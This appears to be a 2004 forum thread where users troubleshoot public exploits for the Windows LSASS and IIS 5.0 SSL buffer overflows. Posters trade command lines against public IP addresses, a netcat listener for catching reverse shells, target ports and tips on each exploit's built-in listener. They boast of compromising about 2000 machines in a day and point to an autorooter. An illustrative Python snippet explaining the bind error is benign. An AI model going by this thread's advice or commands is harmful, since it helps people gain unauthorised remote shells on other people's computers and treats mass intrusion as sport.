lv4
Apr 29 2004, 02:13 AM
..I've seen so many posts about those two that I can't read all of it.
So I just want to ask you people this.
[ Lsasrv.dll RPC ] & [ IIS 5.0 SSL ]
Do they both run on WinXP (SP1 in my case) or not?
Because I get some errors...
Checked it a few times...
One says:
Bind Error: 10048
Another:
shellcode: 316
offset: 53
But none of them give a shell...
So it would be nice if any people out there could say a few things about it.
Thank You
popo0421
Apr 29 2004, 02:25 AM
WinXP can be attacked successfully by sbaa's exploit [Lsasrv.dll RPC].
lv4
Apr 29 2004, 02:39 AM
Thx m8
But I mean which exploit can I RUN successfully?
Because I read that some people have trouble with one of them on XP.
mighty_falcon
Apr 29 2004, 02:52 AM
Does this exploit still work or is it too old? I read somewhere it was released in October 2003.
I gave it a try on win2k and XP locally and it never gave me a shell.

I think this exploit is dead.
EXPLOiTED
Apr 29 2004, 02:55 AM
uhh...nope...not dead...if 2000 PCs in less than 24 hours is dead..then.uh.h...:\
ssj4conejo
Apr 29 2004, 03:18 AM
About the bind error: dude, don't use netcat, the exploit itself listens for the connection. When you have netcat listening, the exploit can't use the port because netcat is obviously using it. And yes, they all work, the SSL and the Lsasrv. They even work on local area networks (very fun in big LANs). Also the Lsasrv works locally, great way to give yourself a shell. = ).
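The "Bind Error: 10048" quoted at the top of the thread is Winsock's WSAEADDRINUSE, which is exactly the condition described above: a second process cannot bind a TCP port that another listener already holds. The following script is an added illustration, not code from the thread; it reproduces the conflict on a loopback port (chosen by the OS, so it is an assumption that no fixed port is needed) and returns the errno the operating system reports for the second bind.

```python
import errno
import socket


def bind_conflict_errno(host="127.0.0.1"):
    """Bind a listener on an OS-chosen port, then try to bind a second socket
    to the same address. Returns the errno from the second bind, or 0 if the
    second bind unexpectedly succeeded."""
    first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        first.bind((host, 0))  # port 0: let the OS pick a free port
        first.listen(1)        # now the port is held, like netcat -L -p <port>
        port = first.getsockname()[1]
        try:
            second.bind((host, port))  # a second listener on the same port
            return 0
        except OSError as exc:
            # On Windows exc.errno is the Winsock code 10048 (WSAEADDRINUSE);
            # on POSIX it is EADDRINUSE (98 on Linux).
            return exc.errno
    finally:
        first.close()
        second.close()


def is_address_in_use(err):
    """True when err is the platform's 'address already in use' code."""
    return err in (errno.EADDRINUSE, getattr(errno, "WSAEADDRINUSE", 10048))


if __name__ == "__main__":
    code = bind_conflict_errno()
    print(f"second bind failed with errno {code}: "
          f"{'address already in use' if is_address_in_use(code) else 'unexpected'}")
```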
Icingtaupe
Apr 29 2004, 03:35 AM
Well, I've tried the lsass exploit with and without nc, it gives me the same results: no shell.
What's wrong?
jimmy
Apr 29 2004, 06:26 AM
It gave me boxes like hell
and EXPLOiTED, I think your math is really really bad
2000 boxes in 24 hours = 1 box every 43 seconds
you're a funny man .... euhm, not
edit: oh yes, just saw it, it was in even less than 24 hours, man, you're a genius!
Nova
Apr 29 2004, 06:54 AM
From what I am using, they are both running on my XP SP1. Lsasrv needs sbaanetapi.dll in its root,
have been successful with 2k, not tried XP yet
Windows Lsasrv.dll RPC bufferoverflow Remote Exploit RPC3
IIS 5.0 SSL Buffer OverFlow V.01
The Storm
Apr 29 2004, 07:04 AM
I even don't get shells, also using win XP SP1. Some ppl got a huge amount of shells and other ones not even one!
Icingtaupe
Apr 29 2004, 11:03 AM
I think there is a trick, a thing we have forgotten, but I don't know what...
For the lsass BOF exploit, I use NetCat in listening mode, and the exploit like rlsasrv.Exe 1 192.160.0.1 666 192.160.2 (with IP addresses on the net, not on a LAN), and... nothing.
I've tried many things, but nothing works... How can I exploit this vulnerability?
limbox
Apr 29 2004, 11:33 AM
Test the autorooter and check your LAN first without a firewall.
Icingtaupe
Apr 29 2004, 11:53 AM
I haven't made it on a LAN, I've tested it with a friend, on the net... I haven't any firewall, no router, same situation for my friend... his system is vulnerable, I know this, but I've got no shell at all...
For example, I've done:
rlsasrv 1 83.152.142.48 125 83.152.203.18
Where the first IP is the remote one, the second is mine...
In another shell, I've launched netcat like this:
nc -L -t -p 125
I run netcat first, then the exploit, and no results...
What is the matter? O_o
ssj4conejo
Apr 29 2004, 01:31 PM
DO NOT use netcat with the SSL exploit (0.2), the exploit already has a built-in listener.

Try it without netcat and it will most likely work, it hasn't failed me yet = ). The best place to test it is in a LAN. As far as Lsasrv.dll goes, it works fine with netcat.
Good luck.
Eichel65
Apr 29 2004, 01:40 PM
You must set your port when you exploit the server!!
The exploit doesn't know your listening port when you don't give it! Shit English, I know! I'm sorry!
You must set your shell port (the port from netcat) and the server will send you the shell to your netcat!!
Good grief, what English that is! Sorry
^^ but I'm in a hurry
greets fly out to TNP
Icingtaupe
Apr 29 2004, 01:50 PM
But the port is included in the command line, no?
It follows the schema:
targetip port myip
Here, it's port 125...
If it's not that... what does the command line look like? Can you give me an example?
A lot of thanks for helping... :]
arn0ld
Apr 29 2004, 02:02 PM
Which ports does lsasrv work on? (which ports should I scan?)
I know of port 139 but there are others, which?
ScriptGod
Apr 29 2004, 02:14 PM
XP and 2k are vuln to LSASS. lsass works over pipes, port 445.
2k is vuln to SSL. XP theoretically too, but there is no standard application which uses SSL. Under 2k there is IIS, which uses SSL.